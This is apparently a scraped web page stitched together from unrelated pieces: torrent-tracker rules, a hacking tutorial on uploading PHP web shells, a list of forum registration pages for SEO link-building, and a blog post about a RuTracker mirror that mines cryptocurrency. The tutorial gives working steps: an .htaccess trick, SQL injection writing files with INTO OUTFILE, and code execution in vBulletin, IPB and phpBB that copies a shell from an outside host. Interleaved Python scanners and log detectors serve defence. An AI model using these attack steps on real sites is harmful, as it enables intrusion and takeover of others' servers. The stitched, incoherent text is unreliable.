Guilty profile php mode. Methods for filling the shell

Rules and restrictions on the tracker.

1. General provisions and restrictions
1.1. These tracker rules are non-negotiable and must be unconditionally followed by everyone present on the tracker. Only Tracker Administrators are allowed not to comply with some provisions of the rules in exceptional situations.
1.2. The tracker administration is the only and highest authority where any conflict situations concerning the tracker and its users can be resolved. Thus, the decisions of the Administrators are final and cannot be appealed.
1.3. The Tracker administration reserves the right to change and supplement all clauses of these rules without prior or subsequent notice. Additions and changes to the rules come into force from the moment of their publication. However, as an act of goodwill, the Administration will try, whenever possible, to bring such changes to the attention of users.
1.4. Ignorance of these and other Tracker Rules not only does not relieve one from responsibility for violating them, but is in itself a violation and an aggravating circumstance.
1.5. It is prohibited to use any programs to falsify data about your Upload and Download. Cheaters are immediately banned.
1.7. It is prohibited to use tracker faults and errors for personal purposes. In case of detection of malfunctions and errors, you must notify the Tracker Administration.
2. Registration
Registration is an integral part of being on the tracker. Registration automatically indicates your agreement with these Rules. If you do not agree with these Rules, write to the administration.
2.1. REGISTRATION FROM VARIOUS FOREIGN PROXY SERVERS IS PROHIBITED. Violators - instant ban!!!
In exceptional cases, it is allowed only after consideration of the application by the administration.
2.2. IT IS PROHIBITED TO REGISTER MORE THAN TWO ACCOUNTS FROM ONE COMPUTER. In case of violation, all existing accounts are banned.
Registration of a new account after the existing two is possible only with the consent of the administration.
3. Rules for commenting on distributions
3.1. The use of profanity in comments to distributions, any obscene words and expressions, veiled obscenities, including in foreign languages, is prohibited.
Punishment: Removal of comments that violate the rules and a ban on writing comments for a period of 1 week. Subsequent violation of this rule will result in a ban for a period of 7 days and a ban on writing comments for a period of 14 days. In the future, there will be a permanent ban on writing comments.
3.2. It is prohibited to insult tracker participants in any form. It is prohibited to display any rudeness, personal insults and obscene statements towards other participants, damaging their reputation, humiliating their honor and dignity, including public showdown of personal relationships, both in personal messages on the tracker and in comments to distributions. Participants must maintain respectful communication.
Punishment: Removal of rule-breaking comments and ban of the violator for a period of 7 days. Subsequent violation of this rule will result in a ban for 7 days and a ban on writing comments for 30 days. In the future, there will be a permanent ban on writing comments.
3.3. Threats of any nature are prohibited (virtual, real and other threats against tracker participants).
Punishment: Deleting messages and banning the offender for 14 days. If this rule is violated again, you will be banned for a month.
3.4. Flaming (messages that are off-topic, intended to start a dispute, as well as personalization of those discussing), flooding (messages that do not correspond to the topic, do not carry a semantic load, or consist only of emoticons) and offtopic (messages that are not related to the topic under discussion) are prohibited, as are incentives to flood, flame or go off-topic and messages like: “Help”, “Problem”, “What are you talking about, huh?” or “So I don’t understand - where to download from?” and the like, not related to this distribution. One comment can contain no more than 3 emoticons.
Punishment: Removal of comments that violate the rules and warning of the comment author for a period of 3 days. If this rule is violated again, the author of the comment will be banned from writing comments for a period of 7 days. In the future, for each violation, a ban on leaving comments is issued for a period of 14 days and a ban on downloading for a period of 14 days.
3.5. It is prohibited to post commercial messages, direct or indirect advertising, spam mailings and links to sites not directly related to the distribution in the comments.
Punishment: Removal of advertising, ban on writing comments for a period of 7 days and ban on downloading for a period of 7 days. In case of repeated violation, a ban on writing comments for a period of 15 days and a ban on downloading for a period of 15 days. In the future there will be a permanent ban on writing comments.
3.6. It is prohibited in comments to show racial, national and religious hostility, to agitate political parties, to promote terrorism, extremism, drugs, religion and other topics incompatible with generally accepted laws of morality and decency.
Punishment: Removal of comments that violate the rules, a ban on writing comments for a period of 14 days and a ban on downloading for a period of 14 days. In case of repeated violation, a ban on writing comments for a period of 30 days and a ban on downloading for a period of 30 days. In the future there will be a permanent ban on writing comments.
3.7. It is prohibited to leave comments that openly or covertly violate the Criminal Code of the Russian Federation, as well as messages calling for the commission of illegal actions.
Punishment: Deletion of messages, ban on writing comments for a period of 14 days and ban on downloading for a period of 14 days. In case of repeated violation, the offender is banned for a period of 30 days. For the third violation - a permanent ban.
3.8. It is prohibited in the comments to distributions to disclose any personal data of users, confidential data, real full names, publication of photographs, dissemination of information about the private life of a discussion participant that constitutes his personal or family secret, without his consent.
Punishment: Removal of rule-breaking comments and verbal warning to the tracker. In case of repeated violation, a ban on writing comments for a period of 7 days. In the future, there will be a ban on writing comments for a period of 30 days.
3.9. It is prohibited to post in comments images containing pornography, scenes of violence or any other images that humiliate or insult other users.
Punishment: Deletion of comments that violate the rules and a ban on downloading and leaving comments for a period of 7 days. In case of repeated violation, the user is banned for a period of 7 days. In the future - a ban for a period of 15 days and a permanent ban on writing comments.
3.10. It is prohibited to use a language other than Russian and a font other than Cyrillic in comments.
Punishment: Deletion of messages and a verbal warning to the user; in case of repeated violation of the rules of this paragraph, a ban on writing comments for a period of 3 days.
3.11. It is prohibited to use the following highlighting methods in messages: red, more than 75% capital letters and large font size - this is the privilege of moderators and administrators.
Punishment: Deletion of messages and a verbal warning to the user; in case of repeated violation of the rules of this paragraph, a ban on writing comments for a period of 7 days.
3.12. Overquoting is prohibited (quoting messages from other participants in quantities exceeding reasonable amounts (more than 10 lines of the original message)).
Punishment: Editing the message and verbally warning the user; in case of repeated violation of the rules of this paragraph, a ban on writing comments for a period of 3 days.
3.13. Spoilers are prohibited; refrain from using them (disclosing key plot points, the knowledge of which could ruin the viewing experience for others, the outcome of the match, etc.).
If you can’t do without spoilers, then you must include the spoiler in the [expand] tag and put the “Spoiler” mark in front of it.
Note: In “sports” distributions it is prohibited to spoil up to 11 comments (1 page).
Punishment: Editing the message and verbally warning the user. If you repeatedly violate the rules of this paragraph, you will be prohibited from writing comments for a period of 3 days.
3.14. It is prohibited to publish messages containing deliberately false information.
Punishment: Removal of rule-breaking comments and verbal warning to the user. If you repeatedly violate the rules of this paragraph, you will be prohibited from leaving comments for a period of 7 days.
The torrent comment system is designed to:
- Express your respect and gratitude to the giver,
- Ask a specific question you are interested in regarding the distribution,
- Provide interesting information related to the giveaway.
4. Restrictions on avatars and signatures:
4.1. Signature:
- Maximum height: 100 pts (in other words, no more than four userbars or ten lines of text (font size 10)); width: 750 pts.
- The total weight of the images contained in the signature should not exceed 200 Kb.
- Content: violence, threats (on a demographic, national, religious or political basis), foul language (profanity, name-calling, rudeness, etc.), debauchery (pornography), discrimination in any form, texts and images of an advertising or commercial character, imitation of titles/ranks of this resource, as well as provocative images, incl. using Nazi symbols, are unacceptable.
- Animation: strongly blinking captions are prohibited (the degree of blinking is determined by the administration).
- The signature under your messages cannot be used to create links to any network resources. (exceptions are links to sites with userbars, services like youtube, google, etc.)
4.2. Avatar:
- Maximum size: 100x100 pixels; weight: up to 21 KB.
- Content: violence, threats (on a demographic, national, religious or political basis), foul language (profanity, name-calling, rudeness, etc.), debauchery (pornography), discrimination in any form, drug propaganda, commercial advertising and advertising texts, imitation of titles/ranks of this resource, deliberate similarity with avatars of members of the administration, as well as provocative images, incl. using Nazi symbols.
- Animation: strongly blinking avatars are prohibited (the degree of blinking is determined by the administration).
Punishment: Removal of signature and avatar, or ban on their use (determined by the administrator).
5. Releases
5.1. It is prohibited to re-upload releases to other trackers without the personal permission of the releaser. Supporting the distribution of a release that is prohibited from re-uploading on another tracker is equivalent to an independent re-upload and is punished in accordance with clause 7.
6. Other
6.1. It is prohibited to upload the contents of distributions using file hosting services such as vip-file, letitbit and others...
6.2. It is prohibited to use any download managers to download torrents.
7. Punishment:
For violations specified in paragraphs 5-6 - a ban for 7 days. Repeated violation of these rules will result in a lifetime ban.

Hello %username% and his friends. Well, you urgently need to upload a shell to the site, well, you never know, maybe the final fee depends on it. Well, it just doesn’t work out. Here I collected a couple of examples (thanks to Tracy and others for this).

Uploading the shell through an image

You have hacked a site (of course you are only testing) with a custom admin panel... And you cannot upload a web shell, but there is an upload of pictures and only loads .jpg, .gif, .png formats.
What can be done in this case?

We shove the shell with the extension .gif into some folder with pictures, and create a .htaccess file with the contents

AddType application/x-httpd-php .gif
This directive makes the server handle files with the .gif extension as PHP
Trying to open /shell.gif

Also, if the script is not indifferent to line breaks, we try to flood the shell, simultaneously renaming it to shell.php%00.jpg, check the availability of shell.php, what if?
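From the defending side, everything this section describes leaves artefacts in the upload directory. The following is an added example, not code from the original post: a Python check that flags a per-directory .htaccess that maps files to PHP, image files that contain a PHP open tag, and names that carry a PHP extension ahead of the image one. The function names, finding labels and sample tree are constructed for illustration.

```python
import os
import re
import tempfile

IMAGE_EXTS = {".jpg", ".jpeg", ".gif", ".png"}
# .htaccess directives that can hand a file to the PHP interpreter.
PHP_MAPPING = re.compile(
    r"^\s*(AddType|AddHandler|SetHandler|ForceType)\b.*(php|x-httpd)", re.IGNORECASE)
# PHP open tag somewhere inside a file that claims to be an image.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)
# A PHP extension followed by another extension, a literal %00, or end of name.
PHP_IN_NAME = re.compile(r"\.(php\d?|phtml|phar)(\.|%00|$)", re.IGNORECASE)


def scan_upload_dir(root):
    """Return sorted (relative_path, reason) findings for an upload directory."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name == ".htaccess":
                with open(path, "r", errors="replace") as fh:
                    if any(PHP_MAPPING.search(line) for line in fh):
                        findings.append((rel, "htaccess-php-mapping"))
                continue
            if PHP_IN_NAME.search(name):
                findings.append((rel, "php-extension-in-name"))
            if os.path.splitext(name)[1].lower() in IMAGE_EXTS:
                with open(path, "rb") as fh:
                    # The first MiB is enough for a marker check on an image.
                    if PHP_TAG.search(fh.read(1 << 20)):
                        findings.append((rel, "php-tag-in-image"))
    return sorted(findings)


def build_sample_tree(root):
    """Constructed sample data: one clean image plus the artefacts described above."""
    files = {
        "img/logo.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
        "img/shell.gif": b"GIF89a<?php /* constructed marker, no payload */ ?>",
        "img/.htaccess": b"AddType application/x-httpd-php .gif\n",
        "img/photo.php.jpg": b"\xff\xd8\xff\xe0" + b"\x00" * 16,
    }
    for rel, data in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(data)


def demo():
    """Build the constructed tree in a temp directory and scan it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_tree(root)
        return scan_upload_dir(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:24} {rel}")
```

Serving the upload directory with `AllowOverride None` and no PHP handler removes the .htaccess route entirely; the scan is then a check that the configuration still holds.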

Method for loading a shell via mysql.user from whine

1) Let’s find out who we are sitting under and also find out his rights to mysql.

site.com/index.php?id=1+and+1=0+union+Select+1,user(),3+--+
(Let's find out who we're sitting under)
2) site.com/index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+where+user=" our user "+--+
(Let's check the privileges of our user. If it gives an error during the output, you can hex our user 0x)
3) site.com/index.php?id=-1+union+select+1,"",3+from+mysql.user+into+outfile+" Path to file "+--+
(Fill in the mini-shell)
P.S.
For everything to work, you need to have write rights and know the full path to the root.
You can also check write permissions like this:

site.com/index.php?id=1+and+1=0+union+Select+1," prava ",3+from+mysql.user+--+
If prava is displayed, then you have rights.

The following situation. We are in the admin panel of the vBulletin forum engine

Let's go:
Plugins & Products -> Plugin Manager -> Plugins & Products -> Plugin Manager -> [Add New Plugin]

Select templates. Usually we select faq_complete, select and click the Plugin is Active checkbox, set it to “Yes” and save.

localhost/forum/faq.php?cmd=phpinfo();

If we have printed phpinfo() then consider the shell in our hands.

Next in phpinfo you need to find the full path to the forum (for example /home/u0000/site.ru/www/sell.php). Next, we need to turn our web shell into a txt file and upload it to any website
mysite.com/shell.txt
Fill shell with command

localhost/forum/faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/site.ru/www/sell.php
What does this command do? It copies the contents of variable [a] to variable [b], that is, shell.txt is copied to shell.php

Loading the shell into IPB 3

Let's go:
Support->SQL Management->Running Processes->Run New Query

Code:
select 0x3c3f706870696e666f28293b3f3e into outfile "Z:/home/site.ru/www/uploads/shell.php"
You can see the full path like this:

Admin->Support
There will be a PHP version written at the top and a link to PHPINFO on the left.

Shell here:
http://site.com/uploads/shell.php

Uploading the shell to phpBB 2

1. Create the ex.sql file
2. Register there

UPDATE phpbb_users SET user_sig_bbcode_uid="(.+)/e\0", user_sig="phpbb:eval(stripslashes($_GET[e]));" WHERE user_id=2;
Where user_id=2 is the administrator ID

3. Go to the admin panel
4. In the admin panel, select the “Restore DB” item and download ex.sql
5. Execute the code / Fill the shell like this

Let's go:
http://target/profile.php?mode=editprofile&e=phpinfo();
After:
http://target/profile.php?mode=editprofile&e=faq.php?cmd=copy($_GET[a],$_GET[b]);&a=mysite.com/shell.txt&b=/home/u0000/ site.ru/www/sell.php
To display phpinfo() you need to be logged in.
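The requests in the sections above are all visible in web server access logs. The following is an added example, not code from the original post: a Python pass over combined-format log lines that decodes each query string and tags the patterns this page uses (UNION SELECT, reads of mysql.user and file_priv, INTO OUTFILE, PHP calls inside a parameter). The rule names and the sample log lines are constructed, and the addresses come from documentation ranges.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Client address, request target and status from a combined-format log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3})')

# Rules are matched against decoded parameter values, not the raw URL.
RULES = [
    ("sqli-union-select", re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S)),
    ("sqli-file-write", re.compile(r"\binto\s+(out|dump)file\b", re.I)),
    ("sqli-mysql-user", re.compile(r"\bmysql\.user\b|\bfile_priv\b", re.I)),
    # Coarse on purpose: a value such as "copy (2)" also matches and needs triage.
    ("php-code-in-param", re.compile(
        r"\b(phpinfo|eval|copy|system|passthru)\s*\(|\$_(GET|POST|REQUEST)\b", re.I)),
]


def classify_request(target):
    """Return the sorted rule names that match any decoded query parameter."""
    hits = set()
    for _key, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        for rule, pattern in RULES:
            if pattern.search(value):
                hits.add(rule)
    return sorted(hits)


def scan_log(lines):
    """Return (ip, target, rules) for every parsable line with at least one hit."""
    alerts = []
    for line in lines:
        match = LOG_RE.match(line)
        if not match:
            continue
        rules = classify_request(match.group("target"))
        if rules:
            alerts.append((match.group("ip"), match.group("target"), rules))
    return alerts


# Constructed sample lines; the query strings follow the shapes shown on this page.
SAMPLE_LOG = [
    '198.51.100.4 - - [10/Oct/2024:13:55:01 +0000] '
    '"GET /forum/faq.php?mode=bbcode HTTP/1.1" 200 4312',
    '203.0.113.7 - - [10/Oct/2024:13:55:36 +0000] '
    '"GET /index.php?id=1+and+1=0+union+Select+1,file_priv,3+from+mysql.user+--+ '
    'HTTP/1.1" 200 981',
    '203.0.113.7 - - [10/Oct/2024:13:56:02 +0000] '
    '"GET /index.php?id=-1+union+select+1,%22x%22,3+into+outfile+%22PLACEHOLDER%22+--+ '
    'HTTP/1.1" 200 0',
    '203.0.113.9 - - [10/Oct/2024:13:57:40 +0000] '
    '"GET /profile.php?mode=editprofile&e=phpinfo(); HTTP/1.1" 200 70211',
]

if __name__ == "__main__":
    for ip, target, rules in scan_log(SAMPLE_LOG):
        print(ip, ",".join(rules), target)
```

A hit on `sqli-file-write` or `php-code-in-param` with a 200 status is the one to follow up first, by checking the web root for files created around the request time.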

This is just a short list of how and on which engines the shell can be loaded. Need more? Welcome to the guys at rdot
uploading to forums
filling on cms
And here is my favorite shell, also on rdot))

So, I think I won’t surprise anyone by saying that the more external links to your site, the larger its TCI and the larger the TCI of the referring site, the greater the “weight” of this link. There are many ways to increase the link mass to your site, but today I will talk about only one of them - obtaining external links from trust sites.
In this article, I will not give all the links to trust sites, which I know, but I’ll tell you only about one of them - forums.
By registering on forums where you can specify a website (As a rule, they are made on the same engine), you will receive an external link.
To make it clear what we are talking about, look at the screenshot below:

That is, you must simply register on such a forum, indicating the site. That's all. (Well, at most, you still have to confirm your registration, so indicate your real e-mail). Typically, a page with a link to your site will look something like this:

Now let's talk about the disadvantages of this method, in my opinion there are two of them:
1) I think that sooner or later you will be removed from the forum for inactivity (But in principle, it won’t be difficult to register again).
2) Accordingly, it is impossible to set a link anchor. (This is probably not even a minus, but a fact, but still).
Well, now the list of fat forums. For convenience, in descending order of TCI:
Link (TCI)
http://forum.igromania.ru/register.php (1700) [Register, then indicate the site in your profile, save]
http://orphus.ru/community/register.html (1500)
http://www.novosti-kosmonavtiki.ru/phpBB2/profile.php?mode=register (1100)
http://www.rmj.ru/phpbb/profile.php?mode=register (1000)
http://www.masterkit.ru/forum/profile.php?mode=register (700)
http://www.ib.ru/forum/profile.php?mode=register (400)
http://forum.mozilla-russia.org/register.php (300) [Indicate the website in your profile]
http://mama-tv.ru/forum/profile.php?mode=register (230)
http://www.neodrive.ru/forum/profile.php?mode=register (170)
http://www.systemaspetsnaz.ru/pforum/profile.php?mode=register (150)
http://tele-club.ru/forum/profile.php?mode=register (130)
http://forum.anastasia.ru/profile.php?mode=register (130)
http://www.shalyapin.ru/forum/profile.php?mode=register (130)
http://www.sarinfo.org/forum/profile.php?mode=register (120)
http://nelubit.ru/profile.php?mode=register (100)
http://www.antisex.info/phpbb2/profile.php?mode=register (60)
http://forum.balletfriends.ru/profile.php?mode=register (50)
http://forum.rusbani.ru/profile.php?mode=register (50)
http://zoneland.ru/forum/profile.php?mode=register (40)
http://forum.av.by/profile.php?mode=register (30)
http://forummotor.israelinfo.ru/profile.php?mode=register (30)
http://wolfson.ru/forum/profile.php?mode=register (30)
http://forum.oslik.ru/profile.php?mode=register (30)
http://data-torrents.com/profile.php?mode=register (20)
http://forum.latfutbols.net/profile.php?mode=register (20)
http://www.forum.hyip-reflection.info/profile.php?mode=register (20)
http://wap.tanchiki.ru/for/profile.php?mode=register (10)

http://www.autoplustv.ru/forum/profile.php?mode=register (500)
http://www.spomir.ru/forum/profile.php?mode=register (350)
http://www.fireman.ru/talk/profile.php?mode=register (300)
http://www.fpss.ru/forum-new/profile.php?mode=register (240)
http://www.skaters.ru/forum/profile.php?mode=register (220)
http://www.a-ivanov.ru/forum/profile.php?mode=register (190)
http://abto-acc.ru/forum/profile.php?mode=register (150)
http://www.artdj.ru/forum/profile.php?mode=register (120)
http://doom-metal.ru/room/profile.php?mode=register (100)
http://www.frisbee.by/f/profile.php?mode=register&agreed=true (80)
http://www.texinfo.ru/forum/ucp.php?mode=register (80) [In profile]
http://globax.biz/forum/profile.php?mode=register (70)
http://www.gracebyte.com/forum/profile.php?mode=register (70)
http://forumjnews.israelinfo.ru/profile.php?mode=register (60)
http://yartech.ru/forum/ucp.php?mode=register (40) [In profile]
http://amrita-dance.ru/forum/profile.php?mode=register (30)
http://forum.isnet.ru/profile.php?mode=register (30)
http://forum.interair.ru/profile.php?mode=register (0
___________________________________________________________________

The last database update was 06/16/11(The list has been cleared of broken links + a few more sites have been added that are below the line)

Also, thanks to a trust site, you can not only increase the TIC, but also increase site traffic! But for this you need a lot of good trust sites, and they, as a rule, are already sold for money. Well, decide for yourself whether to buy them or not...

In conclusion, I can say that do not register at once, on all forums at once, otherwise your site may fall under some kind of filter. 5-8 a day is enough in my opinion. All. Good luck. 😉

Attention!
I am writing this note in 2015 and I want to say that now, in my opinion, leaving links to your blog (site) on these or other, newer trust sites, you will only be wasting your time. Therefore, in order to avoid repeated questions in the comments, I will write here - there will be no updates to this list.
I'd better recommend checking out my list. Of course, posting messages on such blogs is also not as effective as before, but, again, in my subjective opinion, it is many times more effective.

I wrote that when you try to log in to one of the RuTracker mirrors, you receive a message stating that this is only possible if you allow the site to perform calculations on your computer, in other words, to mine cryptocurrency.

After that, I received angry messages in the comments that I was really a fool, and that the mirrors I was describing did not belong to the root tracker and were in no way connected with the root tracker itself. I didn’t attach much importance to this and in the comments to that note I asked the question, but what about the fact that the mirror rutracker-org.appspot.com repeats not only the design of the official website of the rutracker rutracker.org, but also completely repeats its contents. However, in response to this I heard that, I quote: " You are a fool Volokh and you don’t understand anything".

As befits a sane person, he begins to think about the following: If they tell me that I'm a fool, then maybe that's true? I thought so too, but it turned out that no - in this situation I’m not a fool. But first things first.

After RuTracker admins started saying in the comments that:

We have no other mirrors or “child projects”! All other root tracker “clones” that duplicate our structure and design have nothing to do with us, their use can lead to the theft of passwords, the use of your computer for cryptocurrency mining and other troubles! Maintracker is also a fake!!

I began to think, maybe I really got carried away and was in vain slandering the guys from RuTracker. Okay, I decided to compare comments from the official RuTracker website - rutracker.org and comments from the rutracker mirror rutracker-org.appspot.com, which requested permission to generate cryptocurrency. It turned out that the comments are completely identical. But no one will believe me, I decided, and wanted to take screenshots. But this idea also seemed stupid, because... comments can be easily deleted and edited.

The best idea was to record a video. Let’s take a look, and then I’ll comment on what’s happening here:

Have you looked? I’ll say right away that I present the video “as it is,” that is, without editing. Therefore, it is without any comments or voiceover. So let's figure out what's going on here.

To begin with, I created a mailbox to register on the site rutracker-org.appspot.com. Yes, exactly on the site that mines cryptocurrency. Why on it and not on the official website rutracker.org? The fact is that I was faced with the task of showing that the sites rutracker-org.appspot.com and rutracker.org have one database, that is, these sites are interconnected, contrary to the statements of the root tracker administrators.

After I opened my email, I opened the Tor browser and loaded three tabs:

1. Official website rutracker.org;

2. Mirror RuTracker rutracker-org.appspot.com;

3. Tab with an open mailbox.

After this, on the RuTracker mirror rutracker-org.appspot.com I registered (Time 00:25) and an account activation email arrived in my mailbox (Time 00:57). And here interesting dances begin, or rather creepy dances with the burning of the butt of the site administrators: the activation code contains a link to the official website of the tracker (Time 1:00):

https://rutracker.org/forum/profile.php?mode=activate&u=43055955&act_key=nUMiXqWX19EF

This link is working and it leads directly to the official website rutracker.org. By clicking on the link, the account created on the mirror rutracker-org.appspot.com was successfully activated on the official website rutracker.org (Time 1:06). Such are the wonders of technology and the admin's miraculous thoughts. It seems that something is starting to smoke for the site administrators. Well, okay, I’m a fool, as they said, what to take from me. Go ahead.

After successfully activating my account, I go to the mirror rutracker-org.appspot.com and try to log in to the site (Time 1:45). After entering the captcha, I successfully log in using the created account on the “unofficial” tracker (Time 2:03). And at this moment the same notification appears (Time 2:07):

I click on the "Allow" button (Time 2:08) because otherwise I would not be able to log in. After that, I show that the personal account is empty and I have not left any comments yet (Time 2:20).

Now, in order to show the relationship between the mirror and the official website, I choose a random distribution on the site rutracker-org.appspot.com and leave a comment (Time 3:10). After which, on the official website rutracker.org I try to log in (Time 3:40) with an account created on the root tracker mirror. And lo and behold, the login and password from the “unofficial” mirror came up with the official website (Time 4:00). Coincidence? Don't think.

Let's go further, open the list of messages left on the tracker and what we see: a familiar distribution in the list of topics (Time 4:05). Probably also a coincidence, and for greater persuasiveness I open the comment I left on this distribution on a mirror not recognized by the admins (Time 4:17).

Comparing the comment to the distribution from the site rutracker-org.appspot.com and rutracker.org (Time 5:54), once again we are convinced that these two sites are interconnected.

What did the site administrators write to me? It seems they convinced me that the official website and mirror rutracker-org.appspot.com are not interconnected in any way. The comments of the tracker admins clearly state that all mirrors simply duplicate the structure and design of the site, but are not interconnected. However, from what we saw, it turns out that the official website copies comments from some left-wing mirror? No, that's also nonsense. Where is the truth? The truth is that these two sites have one database, and there are many mirrors, some of which are recognized by the tracker administrators, while others are not recognized and are used to generate cryptocurrency.

It turns out that all this time, in the comments they were trying to pour some nonsense into my ears and convince me that I supposedly went to a completely wrong site, but in fact it turned out that this site also belongs to RuTracker.

I suspect that now some people will begin to experience inflammation of the fifth point and will be showered with threats, insults, etc. But I really already thought that it was in vain to attack the guys and they were not to blame for anything. It turned out to be completely different and the video is proof of that. As a colleague said: RuTracker - you were like a brother to me.
